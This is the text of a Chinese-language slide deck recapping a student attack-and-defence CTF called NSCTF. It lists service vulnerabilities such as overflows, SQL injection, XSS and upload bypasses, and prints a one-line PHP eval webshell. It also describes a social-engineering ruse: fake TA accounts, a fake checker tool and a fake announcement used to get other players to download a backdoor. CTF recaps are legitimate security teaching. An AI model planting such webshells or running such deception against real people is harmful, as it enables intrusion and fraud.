NSCTFTakeshi & NaOH

大家早

我們是

NSCTF

NSCTFNetwork Security CTF

( 好啦，這其實是我自己亂下的 XD)

About Takeshi

HITCON staff 2012, 2013, 2014

SITCON staff 2013, 2014, 2015

COSCUP, WebConf…..

C, Python, JavaScript…….

RuCTF, CTCTF

Web security

About NaOH

W2CNLab Master student

Python, C

No experience in wargame & CTF

我們都不是駭客

https://www.flickr.com/photos/sitcon

http://devco.re

先從 SOP 開始講

Before before CTF

分析用的 python script

For binary — system, scanf, strcpy, memcpy

For web — mysql_*, echo, eval, system….

熟悉 gdb

先把可用的 sqli 先蒐集一遍

Before CTF

找洞 -> 寫攻擊 Script -> 測試 -> 補洞

寫 HoneyPot (ssp)

CTF

打人 -> 被打 -> 阿阿阿！ -> 補洞 -> 寫 Script -> 打人

SSP

Buffer Overflow : login, leave message, change money, initial_pinfo

Integer overflow : million, betting, changeback

Command execution : changeback

Logic error : betting

Default password : login

Malicious login session

PMC

SQLi : id query, name query

XSS : message

Backdoor upload : upload

Upload header bypass : upload

getimagesize bypass : upload

.htaccess : upload

Malicious function execution

pmc backdoor

<?php eval($_POST['c']); ?>

pmc backdoor

b347k webshell

pmc & ssp backdoor

Social engineering

帳號 /IP 多Takeshi_tw, TA_ckchen_, TA_zywu_, TA_zywv, Bob_T, Eric….,

布局要夠長第一天開始布局，第三天釋出

下手時機點對大家都累了，或是 Service 相當不穩定

後門要藏的隱密ssp TLE 爆炸 OAO

pmc OK

寫一個相當真的檢查器檢查 www/pc, www/message 權限

檢查與助教機器連線檢查 message 留言

寫一個看起來很真的公告url 裡面有寫 ns-ta-checker

用一個沒有用過的主機當做載點，避免 IP 重複起讓人疑心附贈皮卡丘

等待下載

獲得 flag感覺很多，但實際上有效的只有 1~2 個 flag

–TA

「學生打完期末會不會對人性感到失望啊 !? 」

– 另一個 TA

「別人離鄉背井來這邊讀書結果被騙」

結

NSCTF ，玩的很開心，也很累

學到更多打 CTF 的技巧

社交工程應該是不適用於其他 CTF…..